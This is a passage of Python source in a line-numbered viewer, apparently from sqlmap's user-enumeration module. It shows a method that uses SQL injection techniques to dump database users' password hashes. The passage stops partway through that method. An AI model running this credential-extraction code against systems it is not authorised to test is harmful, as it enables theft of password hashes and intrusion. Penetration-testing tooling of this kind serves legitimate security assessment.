(self)
| 168 | return kb.data.cachedUsers |
| 169 | |
| 170 | def getPasswordHashes(self): |
| 171 | infoMsg = "fetching database users password hashes" |
| 172 | |
| 173 | rootQuery = queries[Backend.getIdentifiedDbms()].passwords |
| 174 | |
| 175 | if conf.user == CURRENT_USER: |
| 176 | infoMsg += " for current user" |
| 177 | conf.user = self.getCurrentUser() |
| 178 | |
| 179 | logger.info(infoMsg) |
| 180 | |
| 181 | if conf.user and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): |
| 182 | conf.user = conf.user.upper() |
| 183 | |
| 184 | if conf.user: |
| 185 | users = conf.user.split(',') |
| 186 | |
| 187 | if Backend.isDbms(DBMS.MYSQL): |
| 188 | for user in users: |
| 189 | parsedUser = re.search(r"['\"]?(.*?)['\"]?\@", user) |
| 190 | |
| 191 | if parsedUser: |
| 192 | users[users.index(user)] = parsedUser.groups()[0] |
| 193 | else: |
| 194 | users = [] |
| 195 | |
| 196 | users = [_ for _ in users if _] |
| 197 | |
| 198 | if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: |
| 199 | if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): |
| 200 | query = rootQuery.inband.query2 |
| 201 | else: |
| 202 | query = rootQuery.inband.query |
| 203 | |
| 204 | condition = rootQuery.inband.condition |
| 205 | |
| 206 | if conf.user: |
| 207 | query += " WHERE " |
| 208 | query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users)) |
| 209 | |
| 210 | if Backend.isDbms(DBMS.SYBASE): |
| 211 | getCurrentThreadData().disableStdOut = True |
| 212 | |
| 213 | retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName, '%s.password' % kb.aliasName], blind=False) |
| 214 | |
| 215 | if retVal: |
| 216 | for user, password in filterPairValues(_zip(retVal[0]["%s.name" % kb.aliasName], retVal[0]["%s.password" % kb.aliasName])): |
| 217 | if user not in kb.data.cachedUsersPasswords: |
| 218 | kb.data.cachedUsersPasswords[user] = [password] |
| 219 | else: |
| 220 | kb.data.cachedUsersPasswords[user].append(password) |
| 221 | |
| 222 | getCurrentThreadData().disableStdOut = False |
| 223 | else: |
| 224 | values = inject.getValue(query, blind=False, time=False) |
| 225 | |
| 226 | if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values): |
| 227 | values = inject.getValue(query.replace("master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr"), blind=False, time=False) |
no test coverage detected